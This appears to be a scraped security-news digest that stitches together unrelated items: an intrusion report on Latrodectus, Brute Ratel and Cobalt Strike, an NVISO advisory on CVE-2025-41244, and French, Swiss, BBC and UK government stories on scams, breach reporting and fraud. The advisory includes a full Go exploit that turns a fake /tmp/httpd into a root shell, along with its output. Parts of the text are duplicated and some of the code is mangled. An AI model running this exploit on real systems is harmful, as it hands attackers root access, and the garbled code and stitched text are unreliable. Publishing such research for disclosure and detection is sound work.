The DFIR Report - thedfirreport.com/2025/09/29 September 29, 2025

Key Takeaways
The intrusion began with a Lunar Spider linked JavaScript file disguised as a tax form that downloaded and executed Brute Ratel via a MSI installer.
Multiple types of malware were deployed across the intrusion, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor.
Credentials were harvested from several sources like LSASS, backup software, and browsers, and also a Windows Answer file used for automated provisioning.
Twenty days into the intrusion data was exfiltrated using Rclone and FTP.
Threat actor activity persisted for nearly two months with intermittent command and control (C2) connections, discovery, lateral movement, and data exfiltration.
This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025

Case Summary
The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which deployed a Brute Ratel DLL file using rundll32.

The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands.

Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host.

On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment.

On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.

They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and setup an additional command and control channel. They also dropped another Cobalt Strike beacon that had a new command and control server. They then used a custom tool that used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that they then tried to execute Metasploit laterally to that domain contoller via a remote service. However they were unable to establish a command and control channel from this action.

On day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt Strike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt Strike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for persistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions.

Fifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send data over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in threat actor actions.

On the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later on the backup server they appeared again and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this hands on activity ceased again.

The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion.

blog.nviso.eu Maxime Thiebaut Incident Response & Threat Researcher Expert within NVISO CSIRT 29.09.2025

NVISO has identified zero-day exploitation of CVE-2025-41244, a local privilege escalation vulnerability impacting VMware's guest service discovery features.

On September 29th, 2025, Broadcom disclosed a local privilege escalation vulnerability, CVE-2025-41244, impacting VMware’s guest service discovery features. NVISO has identified zero-day exploitation in the wild beginning mid-October 2024.

The vulnerability impacts both the VMware Tools and VMware Aria Operations. When successful, exploitation of the local privilege escalation results in unprivileged users achieving code execution in privileged contexts (e.g., root).

Throughout its incident response engagements, NVISO determined with confidence that UNC5174 triggered the local privilege escalation. We can however not assess whether this exploit was part of UNC5174’s capabilities or whether the zero-day’s usage was merely accidental due to its trivialness. UNC5174, a Chinese state-sponsored threat actor, has repeatedly been linked to initial access operations achieved through public exploitation.

Background
Organizations relying on the VMware hypervisor commonly employ the VMware Aria Suite to manage their hybrid‑cloud workloads from a single console. Within this VMware Aria Suite, VMware Aria Operations is the component that provides performance insights, automated remediation, and capacity planning for the different hybrid‑cloud workloads. As part of its performance insights, VMware Aria Operations is capable of discovering which services and applications are running in the different virtual machines (VMs), a feature offered through the Service Discovery Management Pack (SDMP).

The discovery of these services and applications can be achieved in either of two modes:

The legacy credential-based service discovery relies on VMware Aria Operations running metrics collector scripts within the guest VM using a privileged user. In this mode, all the collection logic is managed by VMware Aria Operations and the guest’s VMware Tools merely acts as a proxy for the performed operations.
The credential-less service discovery is a more recent approach where the metrics collection has been implemented within the guest’s VMware Tools itself. In this mode, no credentials are needed as the collection is performed under the already privileged VMware Tools context.
As part of its discovery, NVISO was able to confirm the privilege escalation affects both modes, with the logic flaw hence being respectively located within VMware Aria Operations (in credential-based mode) and the VMware Tools (in credential-less mode). While VMware Aria Operations is proprietary, the VMware Tools are available as an open-source variant known as VMware’s open-vm-tools, distributed on most major Linux distributions. The following CVE-2025-41244 analysis is performed on this open-source component.

Analysis
Within open-vm-tools’ service discovery feature, the component handling the identification of a service’s version is achieved through the get-versions.sh shell script. As part of its logic, the get-versions.sh shell script has a generic get_version function. The function takes as argument a regular expression pattern, used to match supported service binaries (e.g., /usr/bin/apache), and a version command (e.g., -v), used to indicate how a matching binary should be invoked to retrieve its version.

When invoked, get_version loops $space_separated_pids, a list of all processes with a listening socket. For each process, it checks whether service binary (e.g., /usr/bin/apache) matches the regular expression and, if so, invokes the supported service’s version command (e.g., /usr/bin/apache -v).

get_version() {
PATTERN=$1
VERSION_OPTION=$2
for p in $space_separated_pids
do
COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
[ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]}" $VERSION_OPTION 2>&1)" VERSIONEND
done
}
get_version() {
PATTERN=$1
VERSION_OPTION=$2
for p in $space_separated_pids
do
COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
[ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]}" $VERSION_OPTION 2>&1)" VERSIONEND
done
}
The get_version function is called using several supported patterns and associated version commands. While this functionality works as expected for system binaries (e.g., /usr/bin/httpd), the usage of the broad‑matching \S character class (matching non‑whitespace characters) in several of the regex patterns also matches non-system binaries (e.g., /tmp/httpd). These non-system binaries are located within directories (e.g., /tmp) which are writable to unprivileged users by design.

get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\Snginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\Snginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
By matching and subsequently executing non-system binaries (CWE-426: Untrusted Search Path), the service discovery feature can be abused by unprivileged users through the staging of malicious binaries (e.g., /tmp/httpd) which are subsequently elevated for version discovery. As simple as it sounds, you name it, VMware elevates it.

Proof of Concept
To abuse this vulnerability, an unprivileged local attacker can stage a malicious binary within any of the broadly-matched regular expression paths. A simple common location, abused in the wild by UNC5174, is /tmp/httpd. To ensure the malicious binary is picked up by the VMware service discovery, the binary must be run by the unprivileged user (i.e., show up in the process tree) and open at least a (random) listening socket.

The following bare-bone CVE-2025-41244.go proof-of-concept can be used to demonstrate the privilege escalation.

package main

import (
"fmt"
"io"
"net"
"os"
"os/exec"
)

func main() {
// If started with an argument (e.g., -v or --version), assume we're the privileged process.
// Otherwise, assume we're the unprivileged process.
if len(os.Args) >= 2 {
if err := connect(); err != nil {
panic(err)
}
} else {
if err := serve(); err != nil {
panic(err)
}
}
}

func serve() error {
// Open a dummy listener, ensuring the service can be discovered.
dummy, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
return err
}
defer dummy.Close()

// Open a listener to exchange stdin, stdout and stderr streams.
l, err := net.Listen("unix", "@cve")
if err != nil {
return err
}
defer l.Close()

// Loop privilege escalations, but don't do concurrency.
for {
if err := handle(l); err != nil {
return err
}
}
}

func handle(l net.Listener) error {
// Wait for the privileged stdin, stdout and stderr streams.
fmt.Println("Waiting on privileged process...")

stdin, err := l.Accept()
if err != nil {
return err
}
defer stdin.Close()

stdout, err := l.Accept()
if err != nil {
return err
}
defer stdout.Close()

stderr, err := l.Accept()
if err != nil {
return err
}
defer stderr.Close()

// Interconnect stdin, stdout and stderr.
fmt.Println("Connected to privileged process!")
errs := make(chan error, 3)

go func() {
, err := io.Copy(os.Stdout, stdout)
errs <- err
}()
go func() {
, err := io.Copy(os.Stderr, stderr)
errs <- err
}()
go func() {
_, err := io.Copy(stdin, os.Stdin)
errs <- err
}()

// Abort as soon as any of the interconnected streams fails.
_ = <-errs
return nil
}

func connect() error {
// Define the privileged shell to execute.
cmd := exec.Command("/bin/sh", "-i")

// Connect to the unprivileged process
stdin, err := net.Dial("unix", "@cve")
if err != nil {
return err
}
defer stdin.Close()

stdout, err := net.Dial("unix", "@cve")
if err != nil {
return err
}
defer stdout.Close()

stderr, err := net.Dial("unix", "@cve")
if err != nil {
return err
}
defer stderr.Close()

// Interconnect stdin, stdout and stderr.
fmt.Fprintln(stdout, "Starting privileged shell...")
cmd.Stdin = stdin
cmd.Stdout = stdout
cmd.Stderr = stderr

return cmd.Run()
}
package main

import (
"fmt"
"io"
"net"
"os"
"os/exec"
)

func main() {
// If started with an argument (e.g., -v or --version), assume we're the privileged process.
// Otherwise, assume we're the unprivileged process.
if len(os.Args) >= 2 {
if err := connect(); err != nil {
panic(err)
}
} else {
if err := serve(); err != nil {
panic(err)
}
}
}

func serve() error {
// Open a dummy listener, ensuring the service can be discovered.
dummy, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
return err
}
defer dummy.Close()

    // Open a listener to exchange stdin, stdout and stderr streams.
    l, err := net.Listen("unix", "@cve")
    if err != nil {
            return err
    }
    defer l.Close()

    // Loop privilege escalations, but don't do concurrency.
    for {
            if err := handle(l); err != nil {
                    return err
            }
    }

}

func handle(l net.Listener) error {
// Wait for the privileged stdin, stdout and stderr streams.
fmt.Println("Waiting on privileged process...")

    stdin, err := l.Accept()
    if err != nil {
            return err
    }
    defer stdin.Close()

    stdout, err := l.Accept()
    if err != nil {
            return err
    }
    defer stdout.Close()

    stderr, err := l.Accept()
    if err != nil {
            return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Println("Connected to privileged process!")
    errs := make(chan error, 3)

    go func() {
            _, err := io.Copy(os.Stdout, stdout)
            errs <- err
    }()
    go func() {
            _, err := io.Copy(os.Stderr, stderr)
            errs <- err
    }()
    go func() {
            _, err := io.Copy(stdin, os.Stdin)
            errs <- err
    }()

    // Abort as soon as any of the interconnected streams fails.
    _ = <-errs
    return nil

}

func connect() error {
// Define the privileged shell to execute.
cmd := exec.Command("/bin/sh", "-i")

    // Connect to the unprivileged process
    stdin, err := net.Dial("unix", "@cve")
    if err != nil {
            return err
    }
    defer stdin.Close()

    stdout, err := net.Dial("unix", "@cve")
    if err != nil {
            return err
    }
    defer stdout.Close()

    stderr, err := net.Dial("unix", "@cve")
    if err != nil {
            return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Fprintln(stdout, "Starting privileged shell...")
    cmd.Stdin = stdin
    cmd.Stdout = stdout
    cmd.Stderr = stderr

    return cmd.Run()

}
Once compiled to a matching path (e.g., go build -o /tmp/httpd CVE-2025-41244.go) and executed, the above proof of concept will spawn an elevated root shell as soon as the VMware metrics collection is executed. This process, at least in credential-less mode, has historically been documented to run every 5 minutes.

nobody@nviso:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@nviso:/tmp$ /tmp/httpd
Waiting on privileged process...
Connected to privileged process!
Starting privileged shell...
/bin/sh: 0: can't access tty; job control turned off

id

uid=0(root) gid=0(root) groups=0(root)
#
nobody@nviso:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@nviso:/tmp$ /tmp/httpd
Waiting on privileged process...
Connected to privileged process!
Starting privileged shell...
/bin/sh: 0: can't access tty; job control turned off

id

uid=0(root) gid=0(root) groups=0(root)
#
Credential-based Service Discovery
When service discovery operates in the legacy credential-based mode, VMware Aria Operations will eventually trigger the privilege escalation once it runs the metrics collector scripts. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged context of the configured credentials. The beneath process tree was obtained by running the ps -ef --forest command through the privilege escalation shell, where the entries until line 4 are legitimate and the entries as of line 5 part of the proof-of-concept exploit.

UID PID PPID C STIME TTY TIME CMD
root 806 1 0 08:54 ? 00:00:21 /usr/bin/vmtoolsd
root 80617 806 0 13:20 ? 00:00:00 _ /usr/bin/vmtoolsd
root 80618 80617 0 13:20 ? 00:00:00 _ /bin/sh /tmp/VMware-SDMP-Scripts-193-fb2553a0-d63c-44e5-90b3-e1cda71ae24c/script_-28702555433556123420.sh
root 80621 80618 0 13:20 ? 00:00:00 _ /tmp/httpd -v
root 80626 80621 0 13:20 ? 00:00:00 _ /bin/sh -i
root 81087 80626 50 13:22 ? 00:00:00 _ ps -ef --forest
UID PID PPID C STIME TTY TIME CMD
root 806 1 0 08:54 ? 00:00:21 /usr/bin/vmtoolsd
root 80617 806 0 13:20 ? 00:00:00 _ /usr/bin/vmtoolsd
root 80618 80617 0 13:20 ? 00:00:00 _ /bin/sh /tmp/VMware-SDMP-Scripts-193-fb2553a0-d63c-44e5-90b3-e1cda71ae24c/script-28702555433556123420.sh
root 80621 80618 0 13:20 ? 00:00:00 _ /tmp/httpd -v
root 80626 80621 0 13:20 ? 00:00:00 _ /bin/sh -i
root 81087 80626 50 13:22 ? 00:00:00 \ ps -ef --forest
Credential-less Service Discovery
When service discovery operates in the modern credential-less mode, the VMware Tools will eventually trigger the privilege escalation once it runs the collector plugin. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged VMware Tools user context. The beneath process tree was obtained by running the ps -ef --forest command through the privilege escalation shell, where the first entry is legitimate and all subsequent entries (line 3 and beyond) part of the proof-of-concept exploit.

UID PID PPID C STIME TTY TIME CMD
root 10660 1 0 13:42 ? 00:00:00 /bin/sh /usr/lib/x8664-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root 10688 10660 0 13:42 ? 00:00:00 _ /tmp/httpd -v
root 10693 10688 0 13:42 ? 00:00:00 _ /bin/sh -i
root 11038 10693 0 13:44 ? 00:00:00 \ ps -ef --forest
UID PID PPID C STIME TTY TIME CMD
root 10660 1 0 13:42 ? 00:00:00 /bin/sh /usr/lib/x8664-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root 10688 10660 0 13:42 ? 00:00:00 _ /tmp/httpd -v
root 10693 10688 0 13:42 ? 00:00:00 _ /bin/sh -i
root 11038 10693 0 13:44 ? 00:00:00 \ ps -ef --forest
Detection
Successful exploitation of CVE-2025-41244 can easily be detected through the monitoring of uncommon child processes as demonstrated in the above process trees. Being a local privilege escalation, abuse of CVE-2025-41244 is indicative that an adversary has already gained access to the affected device and that several other detection mechanisms should have triggered.

Under certain circumstances, exploitation may forensically be confirmed in legacy credential-based mode through the analysis of lingering metrics collector scripts and outputs under the /tmp/VMware-SDMP-Scripts-{UUID}/ folders. While less than ideal, this approach may serve as a last resort in environments without process monitoring on compromised machines. The following redacted metrics collector script was recovered from the /tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.sh location and mentions the matched non-system service binary on its last line.

!/bin/sh

if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}0.stdout" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stdout"
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stderr" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stderr"
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}_0.stderr"

!/bin/sh

if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}0.stdout" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stdout"
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stderr" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stderr"
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script-{ID}_0.stderr"
Conclusions
While NVISO identified these vulnerabilities through its UNC5174 incident response engagements, the vulnerabilities’ trivialness and adversary practice of mimicking system binaries (T1036.005) do not allow us to determine with confidence whether UNC5174 willfully achieved exploitation.

The broad practice of mimicking system binaries (e.g., httpd) highlight the real possibility that several other malware strains have accidentally been benefiting from unintended privilege escalations for years. Furthermore, the ease with which these vulnerabilities could be identified in the open-vm-tools source code make it unlikely that knowledge of the privilege escalations did not predate NVISO’s in-the-wild identification.

Timeline
2025-05-19: Forensic artifact anomaly noted during UNC5174 incident response engagement.
2025-05-21: Forensic artifact anomaly attributed to unknown zero-day vulnerability.
2025-05-25: Zero day vulnerability identified and reproduced in a lab environment.
2025-05-27: Responsible disclosure authorized and initiated through Broadcom.
2025-05-28: Responsible disclosure triaged, investigation started by Broadcom.
2025-06-18: Embargo extended by Broadcom until no later than October to align release cycles.
2025-09-29: Embargo lifted, CVE-2025-41244 patches and advisory published.

Trois hommes ont été interpellés pour avoir utilisé des SMS frauduleux afin d'escroquer des victimes.

Le Ministère public genevois annonce ce jeudi l’arrestation de trois personnes accusées d’arnaques aux fausses amende. Deux de ces individus ont 21 ans, le troisième 30 ans. L’un a été interpellé le 23 juillet, les deux autres plus récemment, les 5 et 7 septembre.

Deux ont été arrêtés dans des véhicules qui contenaient des «SMS-Blaster», le troisième individu est le propriétaire de l'un des véhicules.

Les «SMS-Blaster»? Ces appareils se substituent aux antennes des opérateurs téléphoniques pour récupérer des numéros de téléphone et envoyer des SMS contenant un lien vers des sites frauduleux.

Exemple donné par le Ministère public: «parkings-ge.com», qui imite le site officiel de la fondation genevoise des parkings.

Faux conseiller bancaire
«Les destinataires des SMS étaient invités à s'acquitter d'une fausse contravention et à fournir à cet effet leurs données personnelles et bancaires», est-il expliqué. «Dans un second temps, les victimes étaient contactées par un faux conseiller bancaire, lequel les incitait à lui transmettre les codes nécessaires pour procéder à des prélèvements sur leur compte bancaire».

Les trois individus arrêtés sont poursuivis pour escroquerie et utilisation abusive d'une installation de télécommunication.

Pour davantage d'information, la police genevoise avait récemment détaillé les arnaques à la fausse contravention ou fausse amende, avec les recommandations d'usage. Les principales étant de ne pas divulguer de données personnelles et de s’assurer de la légitimité de son interlocuteur pour toute sollicitation financière ou urgente.

news.admin.ch Berne, 29.09.2025

— L’obligation légale de signaler les cyberattaques contre les infrastructures critiques est entrée en vigueur le 1er avril 2025. L’Office fédéral de la cybersécurité (OFCS) tire un bilan positif après les six premiers mois. Jusqu’à présent, au total 164 cyberattaques contre des infrastructures critiques ont été signalées. Les sanctions prévues en cas de non-signalement entrent en vigueur le 1er octobre 2025.

L’obligation de signaler des cyberattaques contre des infrastructures critiques est entrée en vigueur il y a six mois. L’OFCS se montre globalement satisfait de la mise en application de cette mesure. Les organisations exploitantes d’infrastructures critiques s’en tiennent au délai légal qui prévoit de signaler des cyberattaques dans les 24 heures. L’utilisation du Cyber Security Hub, qui permet de simplifier considérablement le traitement des cyberattaques par l’OFCS, est particulièrement positive. Déjà avant l’introduction de l’obligation de signaler, la relation de confiance entre l’OFCS et de nombreuses organisations exploitantes d’infrastructures critiques était étroite. La longue collaboration entre les partenaires a constitué la base du lancement réussi de l’obligation de signaler.

164 signalements concernant des infrastructures critiques
Depuis début avril, au total 164 signalements de cyberattaques contre des infrastructures critiques ont été adressés à l’OFCS. Les plus fréquents concernent les attaques DDoS (18.1%), suivies par les piratages (16.1%), les attaques par rançongiciel (12.4%), les vols d’identifiants (11.4%), les fuites de données (9.8%), et les maliciels (9.3%). Des phénomènes combinés tels qu’attaques par rançongiciel avec fuites simultanées de données ont été décrits dans plusieurs cas. Les branches touchées sont multiples. Jusqu’à présent, la branche la plus fortement impactée était la finance (19%), suivie de l’informatique (8.7%) et du secteur de l’énergie (7.6%). D’autres signalements provenaient des autorités, du secteur de la santé, d’entreprises de télécommunication, du secteur postal, du secteur des transports, de la branche des médias et de celle des technologies ainsi que de l’alimentation.

Renforcement de l’échange d’informations
Les signalements sont enregistrés et analysés à des fins statistiques. Les informations obtenues n’aident pas seulement à réagir concrètement à un incident, mais elles contribuent également à une meilleure évaluation des menaces au niveau national et à alerter assez tôt d’autres organisations potentiellement affectées. Depuis l’entrée en vigueur de l’obligation de signaler, beaucoup plus d’organisations participent directement à l’échange d’informations. C’est pourquoi les signalements et les recommandations atteignent nettement plus d’acteurs par ce biais.

Des sanctions à partir du 1er octobre 2025 en cas d’infractions
Les sanctions prévues par la loi sur la sécurité de l’information en cas de non-signalement d’une cyberattaque entrent en vigueur le 1er octobre 2025. Les organisations exploitantes d’infrastructures critiques peuvent être sanctionnées d’une amende allant jusqu’à 100’000 francs si elles ne se conforment pas à cette obligation. Par ailleurs, si l’OFCS dispose d’indices laissant supposer qu’un signalement n’a pas été effectué, il est tenu de prendre contact en premier lieu avec l’autorité concernée. Ce n’est que lorsque les personnes concernées ne réagissent pas à cette prise de contact et à la décision qui s’ensuit, que l’OFCS peut déposer une plainte pénale.

Reporter Joe Tidy was offered money if he would help cyber criminals access BBC systems.

Like many things in the shadowy world of cyber-crime, an insider threat is something very few people have experience of.

Even fewer people want to talk about it.

But I was given a unique and worrying experience of how hackers can leverage insiders when I myself was recently propositioned by a criminal gang.

"If you are interested, we can offer you 15% of any ransom payment if you give us access to your PC."

That was the message I received out of the blue from someone called Syndicate who pinged me in July on the encrypted chat app Signal.

I had no idea who this person was but instantly knew what it was about.

I was being offered a portion of a potentially large amount of money if I helped cyber criminals access BBC systems through my laptop.

They would steal data or install malicious software and hold my employer to ransom and I would secretly get a cut.

I had heard stories about this kind of thing.

In fact, only a few days before the unsolicited message, news emerged from Brazil that an IT worker there had been arrested for selling his login details to hackers which police say led to the loss of $100m (£74m) for the banking victim.

I decided to play along with Syndicate after taking advice from a senior BBC editor. I was eager to see how criminals make these shady deals with potentially treacherous employees at a time when cyber-attacks around the world are becoming more impactful and disruptive to everyday life.

I told Syn, who had changed their name mid-conversation, that I was potentially interested but needed to know how it works.

They explained that if I gave them my login details and security code then they would hack the BBC and then extort the corporation for a ransom in bitcoin. I would be in line for a portion of that payout.

They upped their offer.

"We aren't sure how much the BBC pays you but what if you took 25% of the final negotiation as we extract 1% of the BBC's total revenue? You wouldn't need to work ever again."

Syn estimated that their team could demand a ransom in the tens of millions if they successfully infiltrated the corporation.

The BBC has not publicly taken a position on whether or not it would pay hackers but advice from the National Crime Agency is not to pay.

Still, the hackers continued their pitch.

• GOV.UK
  From:
  Cabinet Office, Public Sector Fraud Authority and Josh Simons MP
  Published
  24 September 2025

Government stops over £480 million ending up in the pockets of fraudsters over twelve months since April 2024 - more money than ever before.

Government stops over £480 million ending up in the pockets of fraudsters over twelve months since April 2024 - more money than ever before.
New technology and artificial intelligence turns the tide in the fight against public sector fraud, with new tech to prevent repeat of Covid loan fraud.
Over a third of the money saved relates to fraud committed by companies and people during the pandemic.
Crackdown means more funding for schools, hospitals and vital public services to deliver the Plan for Change.
Fraudsters have been stopped from stealing a record £480 million from the taxpayer in the government’s biggest ever fraud crackdown, meaning more money can be used to recruit nurses, teachers and police officers as part of the Plan for Change.

Over a third of the money saved (£186 million) comes from identifying and recovering fraud committed during the Covid-19 pandemic. Government efforts to date have blocked hundreds of thousands of companies with outstanding or potentially fraudulent Bounce Back Loans from dissolving before they would have to pay anything back. We have also clawed back millions of pounds from companies that took out Covid loans they were not entitled to, or took out multiple loans when only entitled to one.

This builds on successful convictions in recent months to crack down on opportunists who exploited the Bounce Back Loan Scheme for their own gain, including a woman who invented a company and then sent the loan money to Poland.

Alongside Covid fraud, the record savings reached in the year to April 2025 include clamping down on people unlawfully claiming single persons council tax discount and removing people from social housing waitlists who wanted to illegally sublet their discounted homes at the taxpayers’ expense.

Announcing the record figures at an anti-fraud Five Eyes summit in London, Cabinet Office Minister Josh Simons said:

Working people expect their taxes to go towards schools, hospitals, roads and the services they and their families use. That money going into the hands of fraudsters is a betrayal of their hard work and the system of paying your fair share. It has to stop.

That’s why this government has delivered the toughest ever crackdown on fraud, protecting almost half a billion pounds in under 12 months.

We’re using cutting-edge AI and data tools to stay one step ahead of fraudsters, making sure public funds are protected and used to deliver public services for those who need them most - not line the pockets of scammers and swindlers.

The savings have been driven by comparing different information the government holds to stop people falsely claiming benefits and discounts that they’re clearly not eligible for.

The high-tech push brought around £110m back to the exchequer more than the year before, and comes as the government pushes to save £45 billion by using tech to make the public sector more productive, saving money for the NHS and police forces to deliver the Plan for Change.

The Minister will also unveil a new AI fraud prevention tool that has been built by the government and will be used across all departments after successful tests.

The AI system scans new policies and procedures for weaknesses before they can be exploited, helping make new policies fraud-proof when they are drafting them. The tool could be essential in stopping fraudsters from taking advantage of government efforts to help people in need amid future emergencies.

It has been designed to prevent the scale of criminality seen through the Covid pandemic, where millions were lost to people falsely taking advantage of furlough, Covid Grants and Bounce Back Loans.

Results from early tests show it could save thousands of hours and help prevent millions in potential losses, slashing the time to identify fraud risks by 80% while preserving human oversight.

The UK will also licence the technology internationally, with Five Eyes partners at the summit considering adoption as part of strengthening global efforts to stop fraud and demonstrating Britain’s role at the forefront of innovation.

The summit will bring together key allies and showcase the government’s unprecedented use of artificial intelligence, data-matching and specialist investigators to target fraud across more than a thousand different schemes.

At the summit, Cabinet Office Minister Josh Simons will describe how the record crackdown has been achieved:

Over £68 million of wrongful pension payments were prevented across major public sector pension schemes, including the Local Government Pension Scheme, NHS Pension Scheme, Civil Service Pensions and Armed Forces pension schemes. These savings were achieved by identifying cases where pension payments continued after the individual had died, often with relatives continuing to claim benefits they were not entitled to.
More than 2,600 people were removed from housing waiting lists they weren’t entitled to be on, including individuals who were subletting or had multiple tenancies unlawfully.
Over 37,000 fraudulent single-person council tax discount claims were stopped, saving £36 million for local councils and taxpayers. These false claims, often made by individuals misrepresenting their household size to secure a 25% discount, were uncovered using advanced data-matching.
Today’s announcement follows extensive progress on fraud in the last 12 months, including the appointment of a Covid Counter-Fraud Commissioner, introduced the Public Authorities Fraud, Error and Recovery Bill, and boosted AI-driven detection, saving hundreds of millions and strengthening public sector fraud prevention – driven by the Public Sector Fraud Authority.

The majority of the £480 million saved is taxpayer money, with a portion from private sector partners, such as insurance and utilities companies, helping lower consumer costs and support UK business growth.

Les Numériques
Par
Juliette Sbranna
Publié le 22/09/25 à 19h45

Un fichier prétendument volé à l’ANTS circulerait sur le dark web. Entre rumeurs, échantillons douteux et annonces répétées, on fait le point sur cette affaire et sur ce qui est avéré.

L’ANTS dément le piratage de 12 millions de données : on fait le point sur l’affaire
3
Un fichier prétendument volé à l’ANTS circulerait sur le dark web. Entre rumeurs, échantillons douteux et annonces répétées, on fait le point sur cette affaire et sur ce qui est avéré.

L'ants aurait été volée de 12 millions de données, mais la rumeur serait fausse

Depuis ce week-end, des rumeurs concernant un vol de données de l’ANTS ont circulé. Sauf que ’affaire a pris une tournure inattendue lorsque l’agence a finalement démenti ces rumeurs, tout en laissant la porte ouverte à la possibilité de la perte de quelques informations. Voici un point sur cette situation.

Pour rappel l'Agence Nationale des Titres Sécurisés devenue France Titres, est l'organisme public créé par l’État, qui s’occupe de fabriquer et de délivrer les documents officiels, comme les cartes d’identité, les passeports ou les permis de conduire. Lorsqu’une demande est faite en mairie ou en ligne, c’est elle qui centralise et produit le titre, ce qui poserait un réel problème en cas de fuite.

L'ANTS n'aurait pas été volé
Il serait question d’environ 12 millions de données de l'ANTS circulant sur le dark web et d’un échantillon en libre accès, prétenduemment volés. Cependant, l’affaire a pris une tournure particulière lorsque l’agence a démenti ces rumeurs.

Selon l’ANTS, aucune intrusion n’a été détectée jusqu’à présent. Le groupe précise qu’il, qui dépend du ministère de l’Intérieur et gère des données sensibles, est soumis à des mesures de sécurité strictes et à une surveillance constante des services de l’État.

Aucune intrusion n’a été identifiée au sein des systèmes d’information de l’ANTS, que ce soit par les services de l’agence ou par ceux du ministère de l’Intérieur.

L’échantillon disponible sur le dark web,contient de nombreuses incohérences

Quant à ce fameux échantillon en libre accès, c’est là que l’affaire devient intéressante, car le média ZATAZ a découvert que ce fichier, prétendument de l’ANTS était déjà en vente depuis des mois.

Publicité, votre contenu continue ci-dessous
Publicité
Le même fichier de plus de 10 millions de fiches d’état civil géré par l’ANTS a été exfiltré en mars 2025 via un entrée compromise et a circulé sur le dark web à plusieurs reprises, avec des annonces repérées en juin et relancées mi-septembre 2025. Les pseudos des vendeurs et les plateformes changent, mais il s’agirait bien de la même fuite.

Cependant, ici aussi l’ANTS rassure ses utilisateurs, car ces données seraient non conformes aux formats de l’agence et présenteraient beaucoup trop d’incohérences pour être véridiques.

